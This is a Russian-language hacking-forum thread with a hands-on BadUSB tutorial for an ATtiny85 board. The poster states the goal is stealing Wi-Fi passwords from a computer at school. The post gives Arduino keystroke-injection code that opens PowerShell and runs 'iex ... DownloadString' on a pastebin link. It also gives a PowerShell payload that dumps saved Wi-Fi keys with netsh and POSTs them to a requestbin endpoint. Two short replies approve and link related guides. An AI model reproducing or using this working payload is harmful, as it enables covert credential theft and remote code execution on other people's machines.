• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Настройка attiny85 | BadUSB | RUBBER DUCKY

Moshennik

Резидент
Сообщения
199
Реакции
164
0 руб.
Telegram
Please note, if you want to make a deal with this user, that it is blocked.
Внимание копипас не надо говорить что видели и тд но тут нету !
Тут на днях приехала attiny85. Покупалась с целью создания чего-то типа RUBBER DUCKY.

Решил разобраться сам и поделиться с Вами результатом.



Разница в ценах конечно заметна:

6d0a0ab6bfa79eb41bd9f.png

cb342b781025b9f44a166.png



Сразу решил разбираться, что можно натворить с помощью данной штучки. Пришел к выводу, что если есть лишние деньги, то шняга за 50$ от ребят из hak5gear будет намного функциональнее. Однако выжать свое можно и из attiny85.



Начинаем с установки нужных приложений на наш PC.
Устанавливаем дрова.

Скачали, поставили.

Первое, что нам нужно - Arduino ide (первая кнопка там Windows Installer). Скачали, установили.

Дальше заходим в "Файл - Настойки"

618175616f077e1ba9926.png

Там видим такую тему:я

20d03326adfbb778e35ec.png

Вставляем туда ссыль: http://digistump.com/package_digistump_index.json

Далее топаем в "Менеджер плат"

c33cda4312651e65cd2ac.png

Туда вставляем это: Digistump AVR Boards, жмем More info и жмем "Install" (на скрине уже установлено). Дожидаемся конца установки.

75a761405a92d7fd92b6b.png

Далее снова топаем в Настройки, находим там пункт "Другие настройки можно редактировать непосредственно в файле" и жмем по пути. В открывшийся путь дописываем "\packages\digistump\hardware\avr\1.6.7\libraries\DigisparkKeyboard". Находим там файл DigiKeyboard.h и открываем его блокнотом.

Дописываем туда, где коды клавиш это:

#define KEY_ENTER 40

#define KEY_SPACE 44

#define KEY_SINGLEQ 49

#define KEY_COLON 55

#define KEY_HYPHEN 56

#define KEY_DELETE 76

Сейвим, закрываем.

В самой ардуине снова находим платы, и выбираем там Digispark (Default – 16.6 mhz).

Считайте, что программу мы настроили.





Подключаем возможность пиздить пароли от Wi-Fi с компьютера.
Ориентировано под Windows офк, т.к. целью является ПК на учебе.

Идем на реквестбин. Делаем новую "корзинку".

0f967713aa1cdb0a2d4a4.png

Копируем ее ссылку (не из адресной строки с ?inspect, а ту, что будет посередине экрана). Копируем желательно в блокнот, ибо потеряется.

Идем на pastebin. ОБЯЗАТЕЛЬНО регаемся (через что угодно, хоть гугл).

Делаем новую пасту

4056be2d758cebada36e5.png

И вставляем туда код:

$wifi_ru=(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Содержимое ключа\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ ESSID=$name;PASS=$pass }} | Format-Table -AutoSize
$wifi_en=(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "key\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ ESSID=$name;PASS=$pass }} | Format-Table -AutoSize
$url="https://requestb.in/zz0nzqzz"
$wifi_ru
$wifi_ru | Out-File tmp.txt
$data=Get-Content .\tmp.txt
$data
Invoke-RestMethod -Method Post -Uri $url -Body $data
Remove-Item -Path shellcode.txt
Set-Clipboard -Value "Your computer was fucked up!"
clear
exit



Вставили? Сохраняйте. Сохранили? Молодцы. Тыкаем вот сюда

90ce658dd10c6cbda7811.png

И копируем ссылку на то, что открылось. Ее тоже в блокнот.

Дальше делаем вторую пасту. В нее пишем это:

$source = "ВАША ССЫЛКА НА ПАСТУ"
$destination = "shellcode.txt"
$web = New-Object System.Net.WebClient
$web.DownloadFile($source, $destination)
$file = Get-Content -Path $destination -Encoding UTF8
Set-Clipboard -Value $file



Надеюсь то, что вместо ВАША ССЫЛКА НА ПАСТУ вы вставили ту ссылку, которая в блокноте вторая, да?

В этой пасте тоже нужно нажать на RAW, и ссылка в блокнот скопировать.

Так, вроде как все. Дальше открываем ардуино, и копируем туда код:

#include "DigiKeyboard.h"

void setup() {
DigiKeyboard.update();
}

void loop() {
delay(1000);
DigiKeyboard.update();
delay(100);

// meta+r, delete content, start powershell
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // meta+r
delay(100);
DigiKeyboard.sendKeyStroke(KEY_DELETE); // Clean it up
delay(50);
DigiKeyboard.println("powershell");
delay(200);
DigiKeyboard.println("iex (New-Object Net.WebClient).DownloadString(\"ССЫЛКА НА ВТОРУЮ ПАСТУ\")");
delay(3000);
DigiKeyboard.sendKeyStroke(KEY_V, MOD_CONTROL_LEFT);
delay(50);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
delay(900000);
}



Да, вместо ССЫЛКА НА ВТОРУЮ ПАСТУ пишем сслыку на последнюю созданную пасту.

Seems like это все. Нажимаем сюда вот

95bc8c64b2f271917f8cb.png



и следим за консолью внизу. Как появится надпись со скрина ниже - пихаем attiny85 в порт USB.

0dc32e5e93baa53070896.png



Если вылезло это - молодцы, все сделали верно. Если нет - попробуйте еще раз.

ab7eeca87d6d3b7555178.png



P.S. Вставляя в ПК эту штуку, чекайте расскладку клавиатуры. Работает на английской только, думаю тут ясно. А все пароли от ВиФи будут отправляться на ту реквестбин, которую вы сделали. Открываете главную страницу реквестбин, и там будут справа ваши корзинки. Тыкаете на нужную и юзаете. Ну либо берете ссыль из блокнота, и добавляете в ее конец.
 

yarr

CVE-2020

yarr

CVE-2020
Резидент
Сообщения
268
Реакции
444
0 руб.
Ага. Будет полезно тем, кто купил/купит такие девайсы. Я не стал с ними заморачиваться, использую NetHunter/обычн. флешку. Думал купить утку, но сука дорого, жаба душит.
 

Sleight

Резидент
Сообщения
214
Реакции
206
0 руб.
Telegram
Вот еще по этой же теме инфа была
https://vlmi.top/threads/vvedenie-v-badusb-chast-1.10205/
https://vlmi.top/threads/vvedenie-v-badusb-chast-2.10476/
 
Сверху Снизу